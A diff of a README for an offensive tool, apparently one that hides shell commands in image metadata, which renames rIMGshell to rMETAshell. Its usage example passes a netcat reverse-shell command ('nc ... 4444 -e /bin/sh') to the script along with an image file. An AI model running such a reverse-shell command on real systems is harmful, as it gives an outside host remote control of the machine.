git5loxosec/rMETAshell/README.md

 **Example:**

 ```
-./rIMGshell.sh "nc 192.168.1.128 4444 -e /bin/sh" image.jpg
+./rMETAshell.sh "nc 192.168.1.128 4444 -e /bin/sh" image.jpg
 ```

-Note: Ensure that you have the required dependencies (e.g., exiftool, curl) installed on your system before using rIMGshell.
+Note: Ensure that you have the required dependencies (e.g., exiftool, curl) installed on your system before using rMETAshell.

-**Warning: Ethical and Responsible Use Only rIMGshell is intended for legitimate and ethical purposes, such as penetration testing, cybersecurity assessments, and educational use.
+**Warning: Ethical and Responsible Use Only rMETAshell is intended for legitimate and ethical purposes, such as penetration testing, cybersecurity assessments, and educational use.
 Unauthorized use of this tool for malicious activities is strictly prohibited and may have serious legal consequences.
 Ensure that you have proper authorization and adhere to all applicable laws and regulations before using rIMGshell.**

 ## License